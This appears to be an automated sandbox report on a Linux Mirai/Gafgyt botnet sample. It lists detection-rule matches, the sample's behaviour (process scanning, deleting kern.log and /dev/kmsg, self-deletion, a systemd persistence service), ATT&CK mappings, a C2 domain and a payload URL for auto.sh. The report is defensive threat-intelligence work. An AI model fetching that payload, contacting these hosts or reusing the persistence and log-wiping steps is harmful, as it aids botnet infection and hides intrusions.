Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal72.evad.linELF@0/3@54/0

Data Obfuscation

Manipulation of devices in /dev

Source: /tmp/i586.elf (PID: 6265)

Deleted: /dev/kmsg

Jump to behavior

Source: /usr/libexec/gsd-rfkill (PID: 6295)	Directory: <invalid fd (9)>/..	Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6295)	Directory: <invalid fd (8)>/..	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6302)	Directory: <invalid fd (10)>/..	Jump to behavior

Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/230/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/110/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/231/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/232/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/112/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/233/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/113/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/114/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/115/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/236/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/116/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/237/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/117/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/118/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/910/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/119/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/912/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/10/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/918/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/12/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/13/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/14/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/15/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/16/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/17/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/18/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/120/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/121/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/122/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/243/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/123/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/2/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/124/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/3/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/4/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/125/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/126/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1344/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1465/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1586/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/127/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/6/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/248/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/128/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/249/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1463/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/9/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/801/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/20/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/21/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1900/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/23/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/24/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/25/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/26/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/27/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/28/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/29/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/491/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/250/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/130/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/251/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/252/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/132/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/253/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/4507/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/254/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/255/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/256/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1599/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/257/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1477/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/379/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/258/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1476/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/259/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1475/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/6249/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/6248/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/936/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/30/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/2208/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/6263/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/35/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1809/cmdline	Jump to behavior
Source: /tmp/i586.elf (PID: 6263)	File opened: /proc/1494/cmdline	Jump to behavior

Source: /tmp/i586.elf (PID: 6267)	Shell command executed: sh -c "systemctl daemon-reload"			Jump to behavior
Source: /tmp/i586.elf (PID: 6284)	Shell command executed: sh -c "systemctl enable startup_command.service"			Jump to behavior

Source: /bin/sh (PID: 6269)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload			Jump to behavior
Source: /bin/sh (PID: 6285)	Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.service			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes system log files

Source: /tmp/i586.elf (PID: 6265)

Log files deleted: /var/log/kern.log

Jump to behavior

Sample deletes itself

Source: /tmp/i586.elf (PID: 6263)

File: /tmp/i586.elf

Jump to behavior

Source: /lib/systemd/systemd-hostnamed (PID: 6302)

Queries kernel information via 'uname':

Jump to behavior

Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: /var/lib/vmwareXB
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: 4)/tmp/vmware-root_721-4290559889
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: )/var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: )/var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: /tmp/vmware-root_721-4290559889
Source: i586.elf, 6605.1.0000000008b40000.0000000008b42000.rw-.sdmp	Binary or memory string: )/tmp/vmware-root_721-4290559889(
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: /var/lib/vmware
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: !/var/lib/vmware
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: /var/lib/PackageKit!/var/lib/NetworkManager !/var/lib/vmware/VGAuth
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmp	Binary or memory string: !/var/lib/vmware/VGAuth

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Hidden Files and Directories	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 Indicator Removal	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
i586.elf	53%	Virustotal		Browse
i586.elf	58%	ReversingLabs	Linux.Trojan.Mirai
i586.elf	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
tcpdown.su	45.200.149.167	true	false	high
tcpdown.su	unknown	unknown	true	unknown
tcpdown.su	unknown	unknown	true	unknown
tcpdown.su	unknown	unknown	true	unknown
tcpdown.su	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://154.216.18.192/auto.sh	startup_command.service.13.dr	false		high
http://154.216.18.192/auto.sh;	i586.elf, startup_command.service.13.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
107.175.130.16	unknown	United States	36352	AS-COLOCROSSINGUS	false
45.200.149.167	tcpdown.su	Seychelles	328608	Africa-on-Cloud-ASZA	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
107.175.130.16	m68k.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	i686.elf	Get hash	malicious	Unknown	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
45.200.149.167	sparc.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	x86_64.elf	Get hash	malicious	Unknown	Browse
	socat.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	wrjkngh4.elf	Get hash	malicious	Mirai	Browse
	woega6.elf	Get hash	malicious	Mirai	Browse
	arm5.elf	Get hash	malicious	Mirai	Browse
	m68k.elf	Get hash	malicious	Mirai	Browse
	bot.m68k.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
